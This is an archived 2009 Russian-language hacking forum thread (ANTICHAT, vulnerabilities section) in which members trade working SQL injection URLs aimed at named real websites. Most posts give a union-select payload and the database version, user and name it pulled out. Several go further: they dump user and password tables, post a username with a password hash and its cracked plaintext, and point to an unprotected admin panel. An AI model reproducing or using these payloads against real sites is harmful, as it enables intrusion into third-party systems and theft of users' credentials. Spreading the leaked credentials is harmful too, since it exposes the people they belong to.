HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.03.2009, 20:00
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

www.edutech.ch pr-7
PHP код:
http://www.edutech.ch/lms/ev3/showreport.php?prodid=-121+union+select+1,2,3,4,5,6,concat_ws(0x3A,user(),version(),database()),8,9,10,11,12,13,14--+ 
user : nte_edutech@localhost
version : 5.0.32-Debian_7etch8-log
database : nte_edutech
 
Ответить с цитированием

  #2  
Старый 04.03.2009, 20:13
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

www.advancedbariatriccenter.net

Код:
http://www.advancedbariatriccenter.net/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: advanced_admin@localhost
database: advanced_cms
 
Ответить с цитированием

  #3  
Старый 04.03.2009, 21:15
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.maxauto.ru/index.php?razdel=5&news=-1+union+select+1,concat_ws(0x3a,version( ),databas e(),user()),3,4,5--&page=1
Database Version : 5.0.24a-community-nt
Database name : news
User name : automax@localhost


---------------------------------------------------+

Код:
http://www.maestroauto.com.ua/goods.php?id=-1+union+select+1,2,3,4,concat_w s(0x3a,version (),database(),user()),6,7,8,9,10--
Database Version : 4.1.22-standard
Database name : doktor_automarket
User name : doktor_uzver@localhost


---------------------------------------------------+

Код:
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ ws(0x3a,version(),databas e(),user()),2,3,4--

Database Version : 5.0.45
Database name : contractshinaru
User name : contractshinaru@localhost


юзвери:

Код:
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ws(0x3a,regname ,password),2,3,4+fro m+users--
админка без авторизации :

Код:
http://contractshina.ru/admin
 
Ответить с цитированием

  #4  
Старый 04.03.2009, 21:37
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Код:
http://www.yurmino.com/index.php?page=lech&id=-4+union+select+concat(user(),0x3a,version(),0x3a,database())--
u_yurmino@localhost:4.1.22:yurmino

PR=4

Код:
http://www.4x4parts.ru/come-up.shtml?id=-4+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8--
5.0.45-log:4x4parts:4x4parts@localhost

PR=3

Код:
http://www.ralf-art.ru/news.php?id=-4+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7--
ralfart@localhost:4.1.22:ralfart

PR=4
 
Ответить с цитированием

  #5  
Старый 04.03.2009, 22:13
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Ну вот как обычно небольшой сбор
Налетай
Код:
http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2--
версия/юзер/бд:

Код:
5.0.22:apslaquila@localhost:apslaquila
-----------------------------------------------------------------------

Код:
http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:


Код:
5.0.22:mt_user@lnx6653:I-DEAS_motortribe
--------------------------------------------------------------------


Код:
http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:


Код:
log:Sql85634@62.149.141.41:Sql85634_1
------------------------------------------------------------------

Код:
http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database()),1--
версия/юзер/бд:


Код:
4.1.25:gurtenap@localhost:gurtenap_data
-------------------------------------------------------------------

Код:
http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--
версия/юзер/бд:


Код:
5.0.45:root@localhost:codexflores
----------------------------------------------------------------------

Код:
http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:

Код:
4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger  3

---------------------------------------------------------------------

Код:
http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

версия/юзер/бд:


Код:
4.1.22-standard:web373@localhost:usr_web373_1

-------------------------------------------------------------------


Код:
http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,version(),user(),database())--
версия/юзер/бд:


Код:
5.0.32-Debian_7etch8:root@localhost:cms24
---------------------------------------------------------------------

Код:
http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--
версия/юзер/бд:

Код:
4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palatina

------------------------------------------------------------------

Код:
http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
версия/юзер/бд:


Код:
5.0.77-1-log:jist@localhost:jistTheOfficePub
---------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #6  
Старый 05.03.2009, 02:00
viaman
Новичок
Регистрация: 27.11.2008
Сообщений: 4
С нами: 9186855

Репутация: 3
По умолчанию

http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,group_concat(0x3a,user_id,0 x3a,username,0x3a,userpass),3+from+educos.poll_use r--
Louis:3ca70a4c295483a97698770bc683b11d ------>eiken
 
Ответить с цитированием

  #7  
Старый 04.03.2009, 22:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.mebor.eu/main.php?ids=-148+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,concat_ws(0x3a,version(),database(),user()) ,35,36/*&t=0&lang=11



Database Version: 4.1.22-standard
Database name: meboreu_new
User name: meboreu_new@localhost
 
Ответить с цитированием

  #8  
Старый 04.03.2009, 22:39
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Код:
http://www.bjshijirongtian.com.cn/fen.php?id=-133+union+select+1,2,version(),4,5,6,7/*
5.0.41-community-nt
 
Ответить с цитированием

  #9  
Старый 04.03.2009, 23:08
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
Database Version : 5.0.32-Debian_7etch6-log
Database name : z34747_aam
User name : z34747_aam@77.221.130.25


юзвери:

Код:
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat_ ws(0x3a,email,password ),5,6,7,8,9,10+from+sa_users+limit+1,1--
вход по мылу
 
Ответить с цитированием

  #10  
Старый 04.03.2009, 23:12
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

Наткнулся на интересную скулю, вот:
Код:
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),version(),28,29--
Интересна тем, что при запросе
Код:
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Она не выводит на экран поля, пришлось их угадывать.....кто знает, что это - напишите плиз в ЛС или icq - 95199999
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.